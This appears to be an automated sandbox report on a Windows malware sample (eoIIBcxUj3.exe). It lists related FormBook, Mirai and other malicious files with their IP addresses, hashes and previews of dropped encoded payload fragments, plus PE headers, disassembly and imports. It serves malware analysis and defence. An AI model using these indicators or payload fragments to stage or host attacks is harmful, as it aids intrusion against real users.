                                                            44EgbQcEla.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            99UbUXnwA9.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            www.qzsazi.infoyloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            Solicitud de cotizacion.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            PO490102808.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            44EgbQcEla.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            vmEBHny0Jw.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            3MnerqRZQh.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            99UbUXnwA9.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            PO-0049003088.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            ZvmRwchN1S.ps1Get hashmaliciousVidarBrowse
                                                            • 88.99.125.82
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 88.198.246.242
                                                            VODANETInternationalIP-BackboneofVodafoneDEmips.elfGet hashmaliciousUnknownBrowse
                                                            • 178.15.1.217
                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                            • 88.66.228.64
                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                            • 47.65.3.180
                                                            boatnet.x86_64.elfGet hashmaliciousMiraiBrowse
                                                            • 47.67.78.184
                                                            HSBC-COPY-INT-WIRE_USD18,794.67 Deposit 35%.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            Shipment Update for Order #003666.exeGet hashmaliciousFormBookBrowse
                                                            • 47.83.1.90
                                                            bimbo-m68k.elfGet hashmaliciousUnknownBrowse
                                                            • 109.44.45.222
                                                            bimbo-mpsl.elfGet hashmaliciousUnknownBrowse
                                                            • 188.101.131.36
                                                            bimbo-ppc.elfGet hashmaliciousUnknownBrowse
                                                            • 84.61.19.210
                                                            k03ldc.spc.elfGet hashmaliciousUnknownBrowse
                                                            • 146.61.7.85
                                                            AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                            • 34.249.145.219
                                                            .i.elfGet hashmaliciousUnknownBrowse
                                                            • 34.249.145.219
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 34.249.145.219
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 54.171.230.55
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 34.249.145.219
                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                            • 13.213.51.196
                                                            aramco requesting quotation.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.54.146
                                                            killua.arm5.elfGet hashmaliciousUnknownBrowse
                                                            • 54.171.230.55
                                                            killua.arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 34.249.145.219
                                                            ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                                            • 34.249.145.219
                                                            LOOPIASEZDQZvxRL2e.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            viILoOTXYf.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            lJEn8ko37k.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.86
                                                            Solicitud de cotizacion.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            44EgbQcEla.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            99UbUXnwA9.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            nnBgprBo1I.exeGet hashmaliciousFormBookBrowse
                                                            • 194.9.94.85
                                                            CLOUDFLARENETUSPO Rover 2025-04.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.96.1
                                                            DHL Express_8922309719.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.32.1
                                                            EncriptadoOOKK50.vbsGet hashmaliciousUnknownBrowse
                                                            • 104.21.80.1
                                                            foto_whatsapp_2025-03-31.img.exeGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            Fizet#U00e9si_m#U00e1solat_UniCredit Bank_Hungary.batGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                            • 104.21.112.1
                                                            https://check.cymyv.icu/gkcxv.googleGet hashmaliciousUnknownBrowse
                                                            • 104.21.48.1
                                                            Employee Plan Selection.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                            • 172.67.70.233
                                                            Quote Press Cushion Pad.vbsGet hashmaliciousUnknownBrowse
                                                            • 104.21.32.1
                                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.26.12.205
                                                            Quote Press Cushion Pad.vbsGet hashmaliciousUnknownBrowse
                                                            • 104.21.64.1
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11288
                                                            Entropy (8bit):7.6306513042729005
                                                            Encrypted:false
                                                            SSDEEP:192:b2wF5KLtwCKc+jymytziZ1P8kr51VI+YMw8tR6qJBNgJarEVcj1nIstq:b3F4LtwCSymyteZ2Q1Vji70OJhVs1IsM
                                                            MD5:2981AF49DD93CAE9AE1C6D5B92AB6482
                                                            SHA1:E110373408683F01C72E25D617B091D56F445EAB
                                                            SHA-256:9B24987BC767FADAEDABC41B611FB094C39B9AFDBC29B01FC05A16D387225699
                                                            SHA-512:FCAD78CB35793F3DC0D0EDA38F68A64A07F7356D4B520408979F79B10EF4BC5A58108C4A0817243DFF1D44E3ACE0610A3522BD9E1EC36830DE0BC979DC3BFB38
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:EA06.....L%W.T....J.R.,....L@. .&a*.....X............ ....3`."q*.......x...@..M...6...d.I..Hbp..(.g.a.l..`....B.l........l.. ...c3............->.............lf....N.6?I........>K...@*>....4..,..]....................S...........C..0..$1c....f>...Y@$>`.......H...P...............#...O.l.I.M@.>. .%8.$..>. .$..... x......T.@.5O......~6@-..S...@j........@".5O.......6..., ..`.s6....o.....6....$?;(...0...&.^. ..9...&.^.$..C...f...0....!...'..7.t...>.#...7.t...>........``.S.v.X..a.........@.6....@.77.l...0....6`.c.I.X.f..0....6b.....6b.....66 =....A..}..........A.....lA.....lA....#C...hd.3.hl....Vf@p...cc....'.c....'.c....`$....c...,aZ. .5.j... ...U... ..K.5.F..>.>... ...X..c.|S......XB.0.....}3f..........&.-..C6`.H.a...........>......]..2v@B54....B51.... .. %.......g.4....f ..T.....`f!..........c...@,>.....6...+,..jn.!.L.,>.....a......,..jn...L.,>......).G....h..v.B>y....3....6.....3..... !.<.....X|@.H.....`.CS....h.a.M.X>@....z@.93.......T.....\g ..... ....#.X}SP
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.994432681723551
                                                            Encrypted:true
                                                            SSDEEP:6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
                                                            MD5:8FA33E8E84C5354A288B702B87DD63D2
                                                            SHA1:72E73999DA878FB966E661A7928EE0B5FACBB356
                                                            SHA-256:27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
                                                            SHA-512:9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517
                                                            Process:C:\Windows\SysWOW64\sfc.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):139264
                                                            Entropy (8bit):0.951889861146889
                                                            Encrypted:false
                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaWtPqfPk:CfJ6a9xpnQLqtzKWJntPqfM
                                                            MD5:2791D27717CAB5981A0EA5AD07EE6B64
                                                            SHA1:1ACFA3E6B2D3A682CA918D6C1AA4AEBFBA2D9B75
                                                            SHA-256:A2D12FE1A445318E2A559FA65998843F50469BEDB41B0F8EBEF008DB6EEE1A7F
                                                            SHA-512:74FE33DD01CD441635EA88876E743B755C1092EAE29C8CA71E108995550C7994B1911295FC68F8B6688F0AC1CDB9313FC9A6714FB65BEA3F4956865978006E6F
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):288768
                                                            Entropy (8bit):7.994432681723551
                                                            Encrypted:true
                                                            SSDEEP:6144:1HeSZ29Lx5jAT2Xgpm9qZCLxIYlzkl/VIzRklFtIqiOVml:yx5saQkcCLxPlzkQzRa/liOVml
                                                            MD5:8FA33E8E84C5354A288B702B87DD63D2
                                                            SHA1:72E73999DA878FB966E661A7928EE0B5FACBB356
                                                            SHA-256:27FACC5789B7A0B5555184BDE0EDED585D8AA77D6937FC4584449167ED5F8EAF
                                                            SHA-512:9D51E71DB9A3A542EE416550716C0AA9EF95407DBF8479A57D1219757ACBC2FF5C7E21DA399E7B723D2CDE752EAA434792E0B8281A495E7D72E916B02B5F9696
                                                            Malicious:false
                                                            Preview:.l.6AV7TAI0H..17.G78RHN2.6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0H.517FX.6R.G.p.Qz.wc<,:.80ZVE)*.[3& ]%.2Sb$B:e ^h.zb.%(S]|EC8u6P6BV7T<H9..UV.u'P.o().K...x6P._.~UV.R..n().._3^.6P.EI0HB517..78.IO2i.oBV7TEI0H.536CF<8R.J2Q6P6BV7T.]0HB%17H738RH.2Q&P6BT7TCI0HB517NG78RHN2QFT6BT7TEI0H@5q.HG'8RXN2Q6@6BF7TEI0HR517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2.B5N6V7T..4HB%17H.38RXN2Q6P6BV7TEI0Hb51WHG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517HG78RHN2Q6P6BV7TEI0HB517
                                                            Process:C:\Users\user\Desktop\eoIIBcxUj3.exe
                                                            File Type:ASCII text, with very long lines (57350), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):57350
                                                            Entropy (8bit):2.7900409119053484
                                                            Encrypted:false
                                                            SSDEEP:384:kBV9WjQwYKEVecaiJpqGF2zGVfedBHyI8leWl05L1AyP5y+h8fauFR9I487:6y4gL1AyP8KXp
                                                            MD5:581C7189F2C3334467B680F1E70FD26A
                                                            SHA1:60A19ED64B6F8CB9C567311882DE1102868DD1A9
                                                            SHA-256:F60BA40590A4305D4C12CA3D32BE2FC5C976A9C1B001BC92C432532C593AB684
                                                            SHA-512:5A17EA07B76456B3525481FEC20F080577488492462D694D03DAF053E54C25ED999B6D9DD4E59C7BD560F0A7CF19C7CFAF723C083DC63F64F7B346EAE938C8EC
                                                            Malicious:false
                                                            Preview:*0*x*5*5*8*b*e*c*8*1*e*c*c*c*0*2*0*0*0*0*5*6*5*7*b*8*6*b*0*0*0*0*0*0*6*6*8*9*4*5*8*4*b*9*6*5*0*0*0*0*0*0*6*6*8*9*4*d*8*6*b*a*7*2*0*0*0*0*0*0*6*6*8*9*5*5*8*8*b*8*6*e*0*0*0*0*0*0*6*6*8*9*4*5*8*a*b*9*6*5*0*0*0*0*0*0*6*6*8*9*4*d*8*c*b*a*6*c*0*0*0*0*0*0*6*6*8*9*5*5*8*e*b*8*3*3*0*0*0*0*0*0*6*6*8*9*4*5*9*0*b*9*3*2*0*0*0*0*0*0*6*6*8*9*4*d*9*2*b*a*2*e*0*0*0*0*0*0*6*6*8*9*5*5*9*4*b*8*6*4*0*0*0*0*0*0*6*6*8*9*4*5*9*6*b*9*6*c*0*0*0*0*0*0*6*6*8*9*4*d*9*8*b*a*6*c*0*0*0*0*0*0*6*6*8*9*5*5*9*a*3*3*c*0*6*6*8*9*4*5*9*c*b*9*6*e*0*0*0*0*0*0*6*6*8*9*8*d*4*4*f*f*f*f*f*f*b*a*7*4*0*0*0*0*0*0*6*6*8*9*9*5*4*6*f*f*f*f*f*f*b*8*6*4*0*0*0*0*0*0*6*6*8*9*8*5*4*8*f*f*f*f*f*f*b*9*6*c*0*0*0*0*0*0*6*6*8*9*8*d*4*a*f*f*f*f*f*f*b*a*6*c*0*0*0*0*0*0*6*6*8*9*9*5*4*c*f*f*f*f*f*f*b*8*2*e*0*0*0*0*0*0*6*6*8*9*8*5*4*e*f*f*f*f*f*f*b*9*6*4*0*0*0*0*0*0*6*6*8*9*8*d*5*0*f*f*f*f*f*f*b*a*6*c*0*0*0*0*0*0*6*6*8*9*9*5*5*2*f*f*f*f*f*f*b*8*6*c*0*0*0*0*0*0*6*6*8*9*8*5*5*4*f*f*f*f*f*f*3*3*c*9*6*6*8*9*8*d*5*6*f*f*f*f*f*f*b*a*7*5*0*0*0*0*0*0*6*6*8*9
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.133057707895621
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:eoIIBcxUj3.exe
                                                            File size:1'182'208 bytes
                                                            MD5:c2c8b9851e807452f57cd7a1fabec3ba
                                                            SHA1:d38ad61023caa4d2c2b10e3474ed5658d797cc58
                                                            SHA256:64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0
                                                            SHA512:3225598094182173ea751e6309c2f004b41b15ee1b0c390cfe991211d60c78b941cad038ffd20c58e0d62438c04b9f7347eceb384a3f8947fa46c65095b3d52c
                                                            SSDEEP:24576:PAHnh+eWsN3skA4RV1Hom2KXFmIaleK3JvqW3f2tn5:yh+ZkldoPK1XalD3Vf+
                                                            TLSH:5545AD0273D2C036FFAB92739B6AF60556BD78254133852F13981DB9BD701B2272E663
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                            Icon Hash:aaf3e3e3938382a0
                                                            Entrypoint:0x42800a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6799D872 [Wed Jan 29 07:27:46 2025 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                            Instruction
                                                            call 00007FADB08E469Dh
                                                            jmp 00007FADB08D7454h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push edi
                                                            push esi
                                                            mov esi, dword ptr [esp+10h]
                                                            mov ecx, dword ptr [esp+14h]
                                                            mov edi, dword ptr [esp+0Ch]
                                                            mov eax, ecx
                                                            mov edx, ecx
                                                            add eax, esi
                                                            cmp edi, esi
                                                            jbe 00007FADB08D75DAh
                                                            cmp edi, eax
                                                            jc 00007FADB08D793Eh
                                                            bt dword ptr [004C41FCh], 01h
                                                            jnc 00007FADB08D75D9h
                                                            rep movsb
                                                            jmp 00007FADB08D78ECh
                                                            cmp ecx, 00000080h
                                                            jc 00007FADB08D77A4h
                                                            mov eax, edi
                                                            xor eax, esi
                                                            test eax, 0000000Fh
                                                            jne 00007FADB08D75E0h
                                                            bt dword ptr [004BF324h], 01h
                                                            jc 00007FADB08D7AB0h
                                                            bt dword ptr [004C41FCh], 00000000h
                                                            jnc 00007FADB08D777Dh
                                                            test edi, 00000003h
                                                            jne 00007FADB08D778Eh
                                                            test esi, 00000003h
                                                            jne 00007FADB08D776Dh
                                                            bt edi, 02h
                                                            jnc 00007FADB08D75DFh
                                                            mov eax, dword ptr [esi]
                                                            sub ecx, 04h
                                                            lea esi, dword ptr [esi+04h]
                                                            mov dword ptr [edi], eax
                                                            lea edi, dword ptr [edi+04h]
                                                            bt edi, 03h
                                                            jnc 00007FADB08D75E3h
                                                            movq xmm1, qword ptr [esi]
                                                            sub ecx, 08h
                                                            lea esi, dword ptr [esi+08h]
                                                            movq qword ptr [edi], xmm1
                                                            lea edi, dword ptr [edi+08h]
                                                            test esi, 00000007h
                                                            je 00007FADB08D7635h
                                                            bt esi, 03h
                                                            Programming Language:
                                                            • [ASM] VS2013 build 21005
                                                            • [ C ] VS2013 build 21005
                                                            • [C++] VS2013 build 21005
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            • [ASM] VS2013 UPD5 build 40629
                                                            • [RES] VS2013 build 21005
                                                            • [LNK] VS2013 UPD5 build 40629
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x56320.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x11f0000x7134.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x8f0000x2fd8e0x2fe00f006ab74d3c653b5c5a6cc0c77a171a2False0.32829838446475196data5.7632462979925245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0xc80000x563200x5640043f3df0e76be63dc496f493c466bbfebFalse0.9238734148550725data7.884669776507797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x11f0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                            RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                            RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                            RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                            RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                            RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                            RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                            RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                            RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                            RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                            RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                            RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                            RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                            RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                            RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                            RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                            RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                            RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                            RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                            RT_RCDATA0xd07b80x4d5e8data1.0003344861535355
                                                            RT_GROUP_ICON0x11dda00x76dataEnglishGreat Britain0.6610169491525424
                                                            RT_GROUP_ICON0x11de180x14dataEnglishGreat Britain1.25
                                                            RT_GROUP_ICON0x11de2c0x14dataEnglishGreat Britain1.15
                                                            RT_GROUP_ICON0x11de400x14dataEnglishGreat Britain1.25
                                                            RT_VERSION0x11de540xdcdataEnglishGreat Britain0.6181818181818182
                                                            RT_MANIFEST0x11df300x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                            DLLImport
                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                            PSAPI.DLLGetProcessMemoryInfo
                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                            UxTheme.dllIsThemeActive
